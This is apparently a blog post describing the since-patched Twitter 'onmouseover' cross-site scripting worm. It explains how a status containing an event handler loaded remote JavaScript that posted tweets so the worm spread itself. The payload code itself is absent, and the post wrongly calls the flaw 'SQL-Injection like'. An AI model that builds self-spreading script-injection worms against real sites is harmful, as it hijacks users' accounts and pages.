Apperantly the new Twitter website is vulnerable to a simple SQL-Injection like attack.
It’ll just spit out to the page whatever HTML code you write on your status…
So, the exploit work like this:
User writes the following status line:
The onmouseover event fetches and executes a remote JS code from
The remote script (which is not subject to size limits like the script embedded in the user’s status can basically do whatever the hacker wants.
This one just plays with the page’s HTML to submit a new tweet (from step #1) and spread itself on:
Besides submitting tweets… you can pretty much do whatever you want with the page’s UI etc… lots of fun…
Update: This exploit is now patched.
Related articles by Zemanta
- Twitter ‘onmouseover’ security flaw widely exploited (sophos.com)
- Twitter ‘onmouseover’ security flaw widely exploited (Graham Cluley/Graham Cluley’s blog) (techmeme.com)
- XSS flaw discovered on Twitter (thetechherald.com)
(Cross-posted @ DeveloperZen)